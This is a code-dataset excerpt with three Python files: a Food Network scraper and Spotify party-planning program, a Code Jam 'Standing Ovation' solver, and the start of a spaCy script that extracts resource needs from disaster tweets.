seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
36259278100
|
import requests
from bs4 import BeautifulSoup
import json
import secrets
from requests_oauthlib import OAuth1
from operator import itemgetter
import sqlite3
import csv
import base64
import itertools
import plotly.plotly as py
import plotly.graph_objs as go
import webbrowser
spotifybase = "https://accounts.spotify.com/api/token"
spotifyplay = "https://api.spotify.com/v1/search"
foodnet = "https://www.foodnetwork.com/profiles/talent"
spotify_client = secrets.client_id
spotify_secret = secrets.client_secret
auth = (spotify_client, spotify_secret)
grant_type = 'client_credentials'
CACHE_FNAME = 'final_cache.json'
DBNAME = 'food.db'
CHEFS = 'chefs.json'
DISHES = 'dishes.json'
flavor_dict = {'Aaron McCargo Jr.': 'American',
'Aarti Sequeira': 'South Asian',
'Aarón Sánchez': 'Latin',
'Adam Gertler': 'BBQ',
'Aida Mollenkamp': 'Innovative',
'Alex Guarnaschelli': 'Traditional Home-Cooking',
'Amanda Freitag': 'Traditional Home-Cooking',
'Amy Thielen': 'Traditional Home-Cooking',
'Andrew Zimmern': 'Innovative',
'Anne Burrell': 'Rustic',
'Anne Thornton': 'Sweet Treats',
'Ayesha Curry': 'Home-Cooking',
'Bob Blumer': 'Innovative',
'Bobby Flay': 'American',
'Brian Boitano': 'Innovative',
'Buddy Valastro': 'Sweet Treats',
'Carla Hall': 'Southern Comfort',
'Cat Cora': 'Misc.',
'Chris Santos': 'Innovative',
'Claire Robinson': 'Home-Cooking',
'Curtis Stone': 'Home-Cooking',
'Daisy Martinez': 'Latin',
'Damaris Phillips': 'Southern Comfort',
'Danny Boome': 'Healthy',
'Daphne Brogdon': 'Home-Cooking',
'Dave Lieberman': 'Home-Cooking',
'Donatella Arpaia': 'Home-Cooking',
'Duff Goldman': 'Sweet Treats',
'Eddie Jackson': 'Healthy',
'Ellie Krieger': 'Healthy',
'Emeril Lagasse': 'Misc.',
'Food Network Kitchen': 'Misc.',
'Geoffrey Zakarian': 'Modern American',
'George Duran': 'Global Cuisine',
'Giada De Laurentiis': 'Italian',
'Graham Elliot': 'Misc.',
'Guy Fieri': 'American',
'Ina Garten': 'Home-Cooking',
'Ingrid Hoffmann': 'Misc.',
'Jamie Deen': 'BBQ',
'Jamie Oliver': 'Healthy',
'Janet Johnston': 'Home-Cooked',
'Jeff Corwin': 'Latin',
'Jeff Mauro': 'Misc.',
'Jet Tila': 'East Asian',
'Joey Fatone': 'American',
'Jose Garces': 'Latin',
'Judy Joo': 'Misc.',
'Katie Lee': 'Misc.',
'Keegan Gerhard': 'Sweet Treats',
'Kerry Vincent': 'Sweet Treats',
'Lorraine Pascale': 'Home-Cooking',
'Maneet Chauhan': 'South Asian',
'Marc Murphy': 'Modern American',
'Marcela Valladolid': 'Latin',
'Marcus Samuelsson': 'Misc.',
'Mario Batali': 'Italian',
'Mary Nolan': 'Everyday',
'Masaharu Morimoto': 'East Asian',
"Melissa d'Arabian": 'Healthy',
'Michael Chiarello': 'Italian',
'Michael Symon': 'Misc.',
'Nancy Fuller': 'Southern Comfort',
'Nigella Lawson': 'Home-Cooking',
'Patricia Heaton': 'American',
'Paula Deen': 'Southern',
'Rachael Ray': 'Everyday',
'Ree Drummond': 'Southern Comfort',
'Robert Irvine': 'American',
'Robin Miller': 'Everyday',
'Roger Mooking': 'Global Cuisine',
'Ron Ben-Israel': 'Sweet Treats',
'Sandra Lee': 'American',
'Scott Conant': 'Italian',
'Sherry Yard': 'Sweet Treats',
'Sunny Anderson': 'Southern Comfort',
'Ted Allen': 'American',
'The Hearty Boys': 'Innovative',
'The Neelys': 'BBQ',
'Tia Mowry': 'Everyday',
'Tregaye Fraser': 'Innovative',
'Trisha Yearwood': 'Southern Comfort',
'Tyler Florence': 'Home-Cooking',
'Valerie Bertinelli': 'Misc.',
'Warren Brown': 'Sweet Treats'}
try:
cache_file = open(CACHE_FNAME, 'r')
cache_contents = cache_file.read()
CACHE_DICTION = json.loads(cache_contents)
cache_file.close()
except:
CACHE_DICTION = {}
try:
cache_file = open(CHEFS, 'r')
cache_contents = cache_file.read()
CHEF_DICTION = json.loads(cache_contents)
cache_file.close()
except:
CHEF_DICTION = {}
try:
cache_file = open(DISHES, 'r')
cache_contents = cache_file.read()
DISH_DICTION = json.loads(cache_contents)
cache_file.close()
except:
DISH_DICTION = {}
def get_spotify_token(url, auth):
params = {'grant_type': grant_type}
# if url in CACHE_DICTION:
# access_token = CACHE_DICTION[url][17:100]
# return access_token
# else:
resp = requests.post(url, data=params, auth=auth)
resp_data = json.loads(resp.text)
access_token = resp_data["access_token"]
CACHE_DICTION[url] = resp.text
dumped_json_cache = json.dumps(CACHE_DICTION)
fw = open(CACHE_FNAME,"w")
fw.write(dumped_json_cache)
fw.close()
return access_token
def make_request_using_cache(url, headers=None):
if url in CACHE_DICTION:
return CACHE_DICTION[url]
else:
if headers is None:
resp = requests.get(url)
else:
resp = requests.get(url, headers=headers)
CACHE_DICTION[url] = resp.text
dumped_json_cache = json.dumps(CACHE_DICTION)
fw = open(CACHE_FNAME,"w")
fw.write(dumped_json_cache)
fw.close()
return CACHE_DICTION[url]
def get_spotify_playlist(search_term):
end = ["party", "graph", "term"]
params = {'q': search_term}
url = "{}?type=playlist&limit=5&q=".format(spotifyplay) + search_term
access_token = get_spotify_token(spotifybase, auth)
authorization_header = {"Authorization":"Bearer {}".format(access_token)}
response_string = make_request_using_cache(url, authorization_header)
response = json.loads(response_string)
num = 0
spotify_list = []
for r in response:
for i in range(5):
num += 1
spotify_list.append((response[r]["items"][i]["name"], str(response[r]["items"][i]["tracks"]["total"])))
print(str(num) + ". " + response[r]["items"][i]["name"] + " --- " + str(response[r]["items"][i]["tracks"]["total"]))
print("Do you want to see a bar graph comparing these playlist's lengths,"
"look up another term, or"
" do you want to go start throwing your awesome party?")
response = input("Please enter 'party', 'term', or 'graph': ")
while response not in end:
response = input("Please enter 'party', 'term', or 'graph': ")
if response == 'party':
print("Bye! Have fun!")
exit()
elif response == 'graph':
bar_graph_spotify(spotify_list)
print("Alright! Time for you to go throw the best party out there! See you later!")
exit()
elif response == 'term':
response = input("Please enter a new search term! ")
get_spotify_playlist(response)
return spotify_list
def init_db():
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
statement = '''
DROP TABLE IF EXISTS 'Chefs';
'''
cur.execute(statement)
statement = '''
DROP TABLE IF EXISTS 'Dishes';
'''
cur.execute(statement)
conn.commit()
statement = '''
CREATE TABLE 'Chefs' (
'Id' INTEGER PRIMARY KEY AUTOINCREMENT,
'FirstName' TEXT NOT NULL,
'LastName' TEXT NOT NULL,
'ChefUrl' TEXT NOT NULL,
'PopularRecipe' TEXT,
'FlavorProfile' TEXT
);
'''
cur.execute(statement)
statement = '''
CREATE TABLE 'Dishes' (
'Id' INTEGER PRIMARY KEY AUTOINCREMENT,
'DishName' TEXT NOT NULL,
'DishUrl' TEXT NOT NULL,
'ChefID' INTEGER,
'Type' TEXT NOT NULL,
'LevelDifficulty' TEXT NOT NULL,
'Rating' INTEGER
);
'''
cur.execute(statement)
conn.commit()
conn.close()
class Chef:
def __init__(self, FirstName, LastName, ChefUrl=None):
self.FirstName = FirstName
self.LastName = LastName
self.ChefUrl = ChefUrl
self.full_name = FirstName + " " + LastName
if ChefUrl is not None:
unique_page_text = make_request_using_cache(ChefUrl)
unique_page_soup = BeautifulSoup(unique_page_text, 'html.parser')
if self.full_name in flavor_dict:
try:
most_popular_block = unique_page_soup.find(class_ = "m-MediaBlock o-Capsule__m-MediaBlock m-MediaBlock--recipe")
most_popular = most_popular_block.find(class_="m-MediaBlock__a-HeadlineText").text
self.FlavorProfile = flavor_dict[self.full_name]
if self.full_name == "Bobby Flay" or self.full_name == "Duff Goldman" or self.full_name == "Melissa D'Arabian" or self.full_name == "Nigella Lawson":
recipes_url = ChefUrl + "/recipes"
recipes_text = make_request_using_cache(recipes_url)
recipes_soup = BeautifulSoup(recipes_text, 'html.parser')
recipes_list = recipes_soup.find(class_ = "l-List")
most_popular = recipes_list.find(class_ = "m-MediaBlock__a-HeadlineText").text
except:
most_popular = "N/A"
else:
most_popular = "N/A"
self.FlavorProfile = "N/A"
self.PopularRecipe = most_popular
else:
self.PopularRecipe = "N/A"
class Dish:
def __init__(self, DishName, DishUrl, Rating, Chef):
dish_types = ["Side Dish", "Main Dish", "Snack Dish", "Dessert"]
self.DishName = DishName
self.DishUrl = "http:" + DishUrl
self.Rating = Rating
self.Chef = Chef
dish_type = "Unknown"
dish_page_text = make_request_using_cache(self.DishUrl)
dish_page_soup = BeautifulSoup(dish_page_text, 'html.parser')
try:
level_all = dish_page_soup.find(class_ = "o-RecipeInfo o-Level")
level = level_all.find(class_ = "o-RecipeInfo__a-Description").text
except:
level = "Unknown"
try:
tags = dish_page_soup.find_all(class_ = "o-Capsule__a-Tag a-Tag")
for t in tags:
if t.text in dish_types:
dish_type = t.text
else:
dish_type = "Unknown"
except:
dish_type = "Unknown"
pass
self.Type = dish_type
self.LevelDifficulty = level
pass
def get_chef_info():
init_page_text = make_request_using_cache(foodnet)
init_page_soup = BeautifulSoup(init_page_text, 'html.parser')
name_list = init_page_soup.find_all(class_="m-PromoList__a-ListItem")
chef_list = []
num = 0
for n in name_list:
first_name = n.text.split(" ")[0]
second_word = n.text.split(" ")[1]
last_name = n.text.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = n.text.split(" ")[0] + " and " + n.text.split(" ")[2]
last_name = n.text.split(" ")[3]
chef_url = "https:" + n.find('a')['href']
n = Chef(first_name, last_name, chef_url)
chef_list.append(n)
chef = {"FirstName": n.FirstName,
"LastName": n.LastName,
"ChefUrl": n.ChefUrl,
"PopularRecipe": n.PopularRecipe,
"FlavorProfile": n.FlavorProfile}
CHEF_DICTION[n.full_name] = chef
chef_string = json.dumps(CHEF_DICTION, indent = 4)
fw = open(CHEFS,"w")
fw.write(chef_string)
fw.close()
return chef_list
def get_dish_info():
chefs = get_chef_info()
dishes_list = []
for c in chefs:
chef_dishes = []
if c.full_name in flavor_dict:
dishes_url = c.ChefUrl + "/recipes"
init_page_text = make_request_using_cache(dishes_url)
init_page_soup = BeautifulSoup(init_page_text, 'html.parser')
try:
next_button = init_page_soup.find(class_ = "o-Pagination__a-Button o-Pagination__a-NextButton")
except:
next_button = "No"
big_list = init_page_soup.find(class_="l-List")
ratings_list = []
try:
dish_list = big_list.find_all(class_ = "m-MediaBlock__a-Headline")
except:
pass
try:
ratings = big_list.find_all(class_ = "gig-rating-stars")['title']
for r in ratings:
print(r)
ratings_list.append(ratings)
except:
ratings = "Unknown"
ratings_list.append(ratings)
try:
for d in dish_list:
dish_name = d.text
dish_url = d.find('a')["href"]
dish_rating = "5 out of 5"
d = Dish(dish_name, dish_url, dish_rating, c.full_name)
dishes_list.append(d)
dish = {"DishName": d.DishName,
"DishUrl": d.DishUrl,
"DishRating": d.Rating,
"Type": d.Type,
"LevelDifficulty": d.LevelDifficulty}
chef_dishes.append(dish)
except:
pass
# num = 1
# while next_button != "No":
# num += 1
# next_url = dishes_url + "/trending-/p/" + str(num)
# next_page = make_request_using_cache(next_url)
# next_page_soup = BeautifulSoup(next_page, 'html.parser')
# try:
# next_button = init_page_soup.find(class_ = "o-Pagination__a-Button o-Pagination__a-NextButton")
# except:
# next_button = "No"
# big_list = next_page_soup.find(class_="l-List")
# ratings_list = []
# try:
# dish_list = big_list.find_all(class_ = "m-MediaBlock__a-Headline")
# except:
# dish_list = "no dishes"
# try:
# ratings = big_list.find_all(class_ = "gig-rating-stars")['title']
# for r in ratings:
# print(r)
# ratings_list.append(ratings)
# except:
# ratings = "Unknown"
# ratings_list.append(ratings)
# try:
# for d in dish_list:
# dish_name = d.text
# dish_url = d.find('a')["href"]
# dish_rating = ""
# d = Dish(dish_name, dish_url, dish_rating, c.full_name)
# dishes_list.append(d)
# dish = {"DishName": d.DishName,
# "DishUrl": d.DishUrl,
# "DishRating": d.Rating,
# "Type": d.Type,
# "LevelDifficulty": d.LevelDifficulty}
# chef_dishes.append(dish)
# except:
# pass
# if num == 2:
# break
# try:
# next_button = next_page_soup.find(class_ = "o-Pagination__a-Button o-Pagination__a-NextButton").text
# except:
# next_button = "No"
DISH_DICTION[c.full_name] = chef_dishes
dish_string = json.dumps(DISH_DICTION, indent = 4)
fw = open(DISHES,"w")
fw.write(dish_string)
fw.close()
#print(dishes_list[:30])
return dishes_list
def insert_data():
try:
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
except Error as e:
print(e)
#
# #print('Inserting Data.')
with open(CHEFS) as json_data:
cjson = json.load(json_data)
for c, d in cjson.items():
insertion = (None, d["FirstName"], d["LastName"], d["ChefUrl"], d["PopularRecipe"], d["FlavorProfile"])
statement = 'INSERT INTO "Chefs" '
statement += 'VALUES (?, ?, ?, ?, ?, ?)'
cur.execute(statement, insertion)
chef_dict = {}
statement = '''SELECT Id, FirstName, LastName FROM Chefs'''
cur.execute(statement)
for chef_info in cur:
full_name = chef_info[1] + " " + chef_info [2]
chef_dict[full_name] = chef_info[0]
with open(DISHES) as json_data:
cjson = json.load(json_data)
for c, d in cjson.items():
full_name = c
for i in d:
insertion = (None, i["DishName"].replace("\n", ""), i["DishUrl"], chef_dict[full_name], i["Type"], i["LevelDifficulty"].replace("\n", ""), i["DishRating"])
statement = 'INSERT INTO "Dishes" '
statement += 'VALUES (?, ?, ?, ?, ?, ?, ?)'
cur.execute(statement, insertion)
conn.commit()
conn.close()
def pie_chart(flavor_chef):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
labels = []
values = []
for f in flavor_chef:
labels.append(f)
first_name = f.split(" ")[0]
second_word = f.split(" ")[1]
last_name = f.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = f.split(" ")[0] + " and " + f.split(" ")[2]
last_name = f.split(" ")[3]
query = '''
SELECT COUNT(*)
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE c.FirstName = "{}" AND c.LastName = "{}"
GROUP BY c.ID
'''.format(first_name, last_name)
value = cur.execute(query)
for v in value:
values.append(v[0])
trace = go.Pie(labels=labels, values=values)
py.plot([trace], filename='Flavors')
def bar_graph_spotify(spotify):
x = []
y = []
for w, z in spotify:
x.append(w)
y.append(z)
data = [go.Bar(
x = x,
y = y
)]
py.plot(data, filename='bar-Spotify')
def bar_graph_type(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
chef_types = {}
first_name = command.split(" ")[0]
second_word = command.split(" ")[1]
last_name = command.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = command.split(" ")[0] + " and " + command.split(" ")[2]
last_name = command.split(" ")[3]
query = '''
SELECT COUNT(*), d.Type
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE c.FirstName = "{}" AND c.LastName = "{}"
GROUP BY d.Type
'''.format(first_name, last_name)
types = cur.execute(query)
x = []
y = []
for t in types:
print(t)
x.append(t[1])
y.append(t[0])
data = [go.Bar(
x = x,
y = y
)]
py.plot(data, filename='bar-Type')
def process_flavors(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
flavor_chef = []
query = '''
SELECT FirstName, LastName
FROM Chefs
WHERE FlavorProfile = "{}"
'''.format(command)
chefs = cur.execute(query)
for c in chefs:
full_name = c[0] + " " + c[1]
flavor_chef.append(full_name)
return flavor_chef
conn.close()
def process_chef(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
dishes_o_chefs = []
first_name = command.split(" ")[0]
second_word = command.split(" ")[1]
last_name = command.split(" ")[1:]
if len(last_name) == 2:
last_name = last_name[0] + " " + last_name [1]
elif len(last_name) == 3:
last_name = last_name[0] + " " + last_name [1] + " " + last_name [2]
else:
last_name = last_name[0]
if second_word == "and":
first_name = command.split(" ")[0] + " and " + command.split(" ")[2]
last_name = command.split(" ")[3]
query = '''
SELECT d.DishName, d.DishUrl, d.Rating, d.Type, d.LevelDifficulty
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE c.FirstName = "{}" AND c.LastName = "{}"
'''.format(first_name, last_name)
dishes = cur.execute(query)
for d in dishes:
dish = {}
formatted = d[0] + "--- " + d[3] + ", " + d[2] + ", Level: " + d[4]
dish[d[0]] = [d[1], d[2], d[3], d[4]]
dishes_o_chefs.append(dish)
conn.close()
return dishes_o_chefs
def process_dish(command):
conn = sqlite3.connect(DBNAME)
cur = conn.cursor()
dish = []
query = '''
SELECT d.DishName, d.DishUrl, d.Rating, d.Type, d.LevelDifficulty
FROM Chefs as c
JOIN Dishes as d
ON c.ID = d.ChefID
WHERE d.Type = "{}"
LIMIT 1
'''.format(command)
dishes = cur.execute(query)
for d in dishes:
one_dish = {}
formatted = d[0] + "--- " + d[3] + ", " + d[2] + ", Level: " + d[4]
one_dish[d[0]] = [d[1], d[2], d[3], d[4]]
dish.append(one_dish)
conn.close()
return dish
def flavors():
flavors = ["American", "BBQ", "East Asian", "Everyday", "Global Cuisine", "Healthy",
"Home-Cooking","Innovative","Italian","Latin","Misc.","Modern American",
"Rustic","Southern Comfort","South Asian","Sweet Treats","Trad. Home-Cooking", "exit"]
one_two = ["1", "2", "exit"]
print("Here are the flavors we've put together for your absolutely amazing party: \n"
"American BBQ East Asian\n"
"Everyday Global Cuisine Healthy\n"
"Home-Cooking Innovative Italian\n"
"Latin Misc. Modern American\n"
"Rustic Southern Comfort South Asian\n"
"Sweet Treats Trad. Home-Cooking")
response = input("Please enter a single flavor so we can pull up a list "
"of chefs from FoodNetwork for you! ")
while response not in flavors:
response = input("Whoops! That doesn't look quite right, please try again! ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
flavor_chef = process_flavors(response)
num_chef = 0
print("-"*40, "\n", "CHEFS WITH A ", response, " FLAVOR", "\n", "-"*40)
for f in flavor_chef:
num_chef +=1
print(str(num_chef) + ". " + f)
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you"
"a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes"
"each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
elif response == '2':
pie_chart(flavor_chef)
print("Alright now let's choose a chef/dish!")
chef_dish(flavor_chef)
elif response == 'exit':
print("Bye! Hope your party's a blast!")
exit()
return flavor_chef
def chef_dish(flavor_chef):
chef_dish = ["chef", "dish", "exit"]
kinds = ["Snack", "Side Dish", "Main Dish", "Dessert", "exit"]
response = input("Enter 'chef' or 'dish': ")
while response not in chef_dish:
response = input("Please enter 'chef' or 'dish': ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
elif response == 'chef':
response = input("Nice! Type in the name of the chef you want to look at: ")
while response not in flavor_chef:
response = input("Oops! Did you type that in right? Try again: ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
chef(response)
elif response == 'dish':
print("Solid! Do you want a snack, side, main dish, or dessert?")
response = input("Please enter 'Snack', 'Side Dish', 'Main Dish', or 'Dessert': ")
while response not in kinds:
response = input("Oops! Did you type that in right? Try again: ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
dish(response)
return 0
def dish(kind):
music_flavor = ["music", "flavor"]
yes_no = ["yes", "no", "exit"]
one_two = ["1", "2", "exit"]
print("-"*15, "\n", "A ", kind, "DISH" "\n", "-"*15)
dish = process_dish(kind)
for d in dish:
for i in d:
formatted = i + " --- " + d[i][2] + ", " + d[i][1] + ", Level: " + d[i][3].replace(" ", "")
print(formatted)
print("\n Do you want to go to the url for this dish?")
response = input("Enter 'yes' to go to the url or enter 'no' to go back to flavors: ")
while response not in yes_no:
response = input("Please enter 'yes' or 'no': ")
if response == "yes":
for d in dish:
url = d[i][0]
print("Launching " + url + " in browser!")
webbrowser.open(url)
print("Are you satisfied with your recipe? Do you want to go look at music?")
response = input("Enter 'music' for music or enter 'flavor' to go back to the flavors ")
while response not in music_flavor:
response = input("Please try again: ")
if response == 'music':
response = input("Enter a search term for Spotify: ")
spotify = get_spotify_playlist(response)
bar_graph_spotify(spotify)
elif response == 'flavor':
flavor_chef = flavors()
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you "
" a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes "
" each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
if response == '2':
pie_chart(flavor_chef)
elif response == "no":
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
return 0
def chef(name):
music_flavor = ["music", "flavor", "exit"]
one_two = ["one", "two", "exit"]
num_chef_dish = 0
print("-"*30, "\n", "DISHES BY ", name, "\n" + "-"*30)
dishes_o_chefs = process_chef(name)
dish_nums = []
for d in dishes_o_chefs:
for i in d:
num_chef_dish += 1
formatted = str(num_chef_dish) + ". " + i + " --- " + d[i][2] + ", " + ", Type: " + d[i][1] + ", Level: " + d[i][3].replace(" ", "")
print(formatted)
dish_nums.append((num_chef_dish - 1, d[i][0]))
response = input("Enter a number to go to that dish's url, enter 'flavor' to go back to the flavors, or"
"enter 'graph' to see a graph of this chef's number of main, side, snack, and dessert dishes! ")
if response == "flavor":
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response.isdigit() == True:
# try:
url = dish_nums[(int(response)-1)][1]
print(url)
print("Launching " + url + " in browser!")
webbrowser.open(url)
# except:
# print("URL Unknown")
print("Are you satisfied with your recipe? Do you want to go look at music?")
response = input("Enter 'music' for music or enter 'flavor' to go back to the flavors ")
while response not in music_flavor:
response = input("Please try again: ")
if response == 'music':
response = input("Enter a search term for Spotify: ")
get_spotify_playlist(response)
elif response == 'flavor':
flavor_chef = flavors()
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you"
" a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes"
" each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
elif response == '2':
pie_chart(flavor_chef)
print("Great! Let's go look at some chef/dishes from this flavor now!")
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
elif response == 'graph':
bar_graph_type(name)
print("Nice!")
response = input("Enter a number to go to that dish's url, enter 'flavor' to go back to the flavors, or"
"enter 'graph' to see a graph of this chef's number of main, side, snack, and dessert dishes! ")
if response == "flavor":
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response.isdigit() == True:
#try:
url = dish_nums[(int(response)-1)][1]
print(url)
print("Launching " + url + " in browser!")
webbrowser.open(url)
# except:
# print("URL Unknown")
print("Are you satisfied with your recipe? Do you want to go look at music?")
response = input("Enter 'music' for music or enter 'flavor' to go back to the flavors ")
while response not in music_flavor:
response = input("Please try again: ")
if response == 'music':
response = input("Enter a search term for Spotify: ")
get_spotify_playlist(response)
elif response == 'flavor':
flavor_chef = flavors()
print("Cool! So you've got a couple of options now! Path 1: You can choose a chef to look at or we can give you"
"a dish from this flavor! Path 2: You can open a plotly pie chart showing the amount of recipes"
"each of these chefs have! Which one do you want to do?")
response = str(input("Enter '1' or '2' for either path: "))
while response not in one_two:
response = input("Enter '1' or '2' for either path: ")
if response == '1':
chef_dish(flavor_chef)
if response == '2':
pie_chart(flavor_chef)
print("Great! Let's go look at some chef/dishes from this flavor now!")
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
else:
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
while response != 'flavor':
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
flavor_chef = flavors()
chef_dish(flavor_chef)
elif response == "exit":
print("Bye! Hope your party's a blast!")
exit()
else:
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
while response != 'flavor':
print("Hmmm. That doesn't seem right!")
response = input("Enter 'flavor' to go back to the flavors! ")
flavor_chef = flavors()
chef_dish(flavor_chef)
def interactive_prompt():
one_two = ["1", "2", "exit"]
print("-"*30, "\n", "PARTY PLANNING PROGRAM \n", "-"*30)
print("Hey! So you wanna plan a party? Don't know where to start? Look no "
"further! We'll help you with the two most important parts of any party: "
"food and music! (You've gotta take care of the conversation on your own, "
"though, sorry!)")
response = input("Enter anything if this is the program you've been looking for "
"your whole life (enter 'exit' if you want to leave!): ")
if response == "exit":
print("Bye! Hope your party's a blast!")
exit()
print("With P^3 you can get delicious recipes and great music for the "
"best party you've ever thrown. Yes, even better than your neighbor Janet's "
"Halloween party last year.")
response = input("Cool right? ")
if response == 'exit':
print("Bye! Hope your party's a blast!")
exit()
print("Yea, we think so too. Let's get started.")
flavor_chef = flavors()
if __name__=="__main__":
#get_dish_info()
#init_db()
#insert_data()
interactive_prompt()
#get_spotify_playlist("country")
|
jntoma/finalproj206
|
final_food.py
|
final_food.py
|
py
| 33,382 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4470012110
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 23:13:16 2015
@author: maxshashoua
"""
file = list(open("Standing_Ovation_Large.in"))
for i in range(len(file)):
file[i] = file[i].strip("\n").strip()
T = int(file[0])
Total = T
data = file[1:]
""""
for l in data:
t = l[0]
s = 1
friends = 0
raw = l[2:]
# j in raw is each character in the raw data for number of people in one puzzle
for j in raw:
s -= 1
s += int(j)
if s == 0:
friends += 1
s += 1
print('Case #' + str(Total - T + 1) + " " + str(friends))
T -= 1
"""
f = open("Standing_Ovation_Large_Attempt.txt", "w")
for l in data:
t = l[0]
s = 1
friends = 0
rawP = l.split(" ")
raw = rawP[1]
# j in raw is each character in the raw data for number of people in one puzzle
for j in raw:
s -= 1
s += int(j)
if s == 0:
friends += 1
s += 1
f.write('Case #' + str(Total - T + 1) + " " + str(friends) + "\n")
print('Case #' + str(Total - T + 1) + " " + str(friends) + "\n")
T -= 1
print("done")
|
emsha/Code-Jam
|
standingovation.d/Standing_Ovation_Solver.py
|
Standing_Ovation_Solver.py
|
py
| 1,142 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5259664413
|
import re
#import CMUTweetTagger
#import cPickle
from collections import defaultdict
import pickle
from nltk.corpus import wordnet as wn
from itertools import product
import spacy
from spacy.symbols import *
from nltk import Tree
import nltk
nlp=spacy.load('en')
np_labels=set(['nsubj','dobj','pobj','iobj','conj','nsubjpass','appos','nmod','poss','parataxis','advmod','advcl'])
subj_labels=set(['nsubj','nsubjpass'])
need_verb_list=['need','require','want','lack']
send_verb_list=['send','give','donate','transfer','distribute','aid','help','procure']
common_resource=['food','water','medicine','tent','clothes','communication','transport','infrastructure','shelter','internet','sanitation','hospital','donations']
modifiers=['nummod','compound','amod','punct']
after_clause_modifier=['relcl','acl','ccomp','xcomp','acomp','punct']#,'nn','quantmod','nmod','hmod','infmod']
verb_count={}
resource_array=[]
modified_array=[]
# nepal_stop_list=['nepal','earthquake','quake','nepalese']
nepal_stop_list=[]
tel_no="([+]?[0]?[1-9][0-9\s]*[-]?[0-9\s]+)"
email="([a-zA-Z0-9]?[a-zA-Z0-9_.]+[@][a-zA-Z]*[.](com|net|edu|in|org|en))"
web_url="http:[a-zA-Z._0-9/]+[a-zA-Z0-9]"
entity_type_list=['NORP','ORG','GPE','PERSON']
quant_no="([0-9]*[,.]?[0-9]+[k]?)"
need_send_verb_list=['need','require','want','lack','send','give','donate','transfer','distribute','aid','help','support','procure']
# def quant_no(resource):
# return [i for re.findall(quant_no,resource)]
def modifier_word(word):
modified_word=word.orth_
while word.n_lefts+word.n_rights==1 and word.dep_.lower() in modifiers:
word=[child for child in word.children][0]
modified_word=word.orth_+" "+modified_word
return modified_word
def tok_format(tok):
return "_".join([tok.orth_, tok.dep_,tok.ent_type_])
def to_nltk_tree(node):
if node.n_lefts + node.n_rights > 0:
return Tree(tok_format(node), [to_nltk_tree(child) for child in node.children])
else:
return tok_format(node)
def get_children(word,resource_array,modified_array):
#print(word,word.dep_)
for child in word.children:
if child.dep_.lower() in modifiers:
get_word=modifier_word(child)+" "+word.orth_+"<_>"+word.dep_
modified_array.append(get_word)
if child.dep_.lower()=='prep' or child.dep_.lower()=='punct':
get_children(child,resource_array,modified_array)
if child.dep_.lower() in after_clause_modifier:
#print(child, child.dep_)
get_children(child,resource_array,modified_array)
if child.dep_.lower() in np_labels:
get_children(child,resource_array,modified_array)
resource_array.append(child.orth_+"<_>"+child.dep_)
else:
if get_verb_similarity_score(child.orth_,common_resource)>0.7 :
get_children(child,resource_array,modified_array)
def get_verb_similarity_score(word,given_list):
max_verb_similarity=0
if word.lower() in given_list:
max_verb_similarity=1
else:
